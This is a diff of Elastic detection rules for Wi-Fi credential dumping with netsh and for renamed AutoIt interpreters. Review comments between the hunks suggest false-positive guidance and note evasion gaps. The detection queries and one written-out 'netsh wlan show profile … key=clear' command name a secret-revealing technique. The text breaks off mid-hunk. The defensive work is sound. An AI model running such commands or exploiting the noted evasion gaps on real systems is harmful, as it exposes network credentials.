 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -91,7 +91,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_6.json b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_6.json
index 85919573dad..684239d78c6 100644
--- a/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_6.json
+++ b/packages/security_detection_engine/kibana/security_rule/2de87d72-ee0c-43e2-b975-5f0b029ac600_6.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Wireless Credential Dumping using Netsh Command", - "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False 
positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Wireless Credential Dumping using Netsh Command\n\nNetsh is a Windows command line tool used for network configuration and troubleshooting. It enables the management of network settings and adapters, wireless network profiles, and other network-related tasks.\n\nThis rule looks for patterns used to dump credentials from wireless network profiles using Netsh, which can enable attackers to bring their own devices to the network.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"netsh.exe\" or process.pe.original_file_name == \"netsh.exe\") and\n process.args : \"wlan\" and process.args : \"key*clear\"\n",
 "references": [
 "https://learn.microsoft.com/en-us/windows-server/networking/technologies/netsh/netsh-contexts",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
@@ -92,7 +92,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
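Review bot: The false-positive section kept in the changed `note` line still says "This activity is unlikely to happen legitimately", but the `query` on the following context line fires on every `netsh wlan … key=clear` invocation, and help-desk or administrator recovery of a saved Wi-Fi passphrase is a routine benign source of exactly that command line. I would add a bullet under "False positive analysis" such as `- Administrator or help-desk recovery of a saved Wi-Fi passphrase (for example netsh wlan show profile name=<SSID> key=clear) also triggers this rule; check whether the account is an expected administrator, whether the parent is an interactive shell or an unattended script/scheduled task, and whether the output was redirected to a file or followed by outbound transfer.` The investigation steps could also tell the analyst to review the full `process.command_line` and record which profiles were exported, since the rule only matches the `wlan` and `key*clear` argument tokens. One caveat worth a sentence in the guide: netsh accepts abbreviated context and command names, so an invocation that does not spell out the literal `wlan` token may not satisfy `process.args : "wlan"` — confirm against the data source before relying on that token match. The enclosing JSON object continues outside this hunk; the `@@ -72` and `@@ -92` hunks only unescape `&`.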
diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_104.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_104.json
index 9264b10aa1e..73ba80cc274 100644
--- a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_104.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. 
Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the 
existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).",
 "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n",
 "related_integrations": [
 {
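Review bot: The false-positive section in the changed `note` line states the activity is unlikely to happen legitimately, but the `query` on the next context line keys only on `process.pe.original_file_name : "AutoIt*.exe"`, and, as far as I recall, applications built with the AutoIt compiler keep the interpreter's original file name in their version resource unless the author overrides it, so any legitimately compiled AutoIt tool running under a vendor-chosen executable name will match. I would add a bullet such as `- Compiled AutoIt applications frequently retain the interpreter's OriginalFileName while running under a product-specific name; triage on code-signing status, prevalence, and installation path before treating the rename as evasion.` The guide should also state the rule's limit: the match depends on PE version metadata the adversary controls, so a renamed interpreter with a stripped or edited VERSIONINFO resource is not detected, and a miss must not be read as absence. The enclosing JSON object continues outside this hunk.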
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_105.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_105.json
index 8e15b4ec374..c1845c167af 100644
--- a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_105.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. 
By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM 
dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name : \"AutoIt*.exe\" and not process.name : \"AutoIt*.exe\"\n", "related_integrations": [ { 
@@ -50,7 +50,7 @@
 ],
 "risk_score": 47,
 "rule_id": "2e1e835d-01e5-48ca-b9fc-7a61f7f11902",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_106.json b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_106.json
index db7ce9023e2..cb2e5a5c9ca 100644
--- a/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/2e1e835d-01e5-48ca-b9fc-7a61f7f11902_106.json
@@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Renamed AutoIt Scripts Interpreter", - "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Renamed AutoIt Scripts Interpreter\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. 
By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nAutoIt is a scripting language and tool for automating tasks on Microsoft Windows operating systems. Due to its capabilities, malicious threat actors can abuse it to create malicious scripts and distribute malware.\n\nThis rule checks for renamed instances of AutoIt, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine 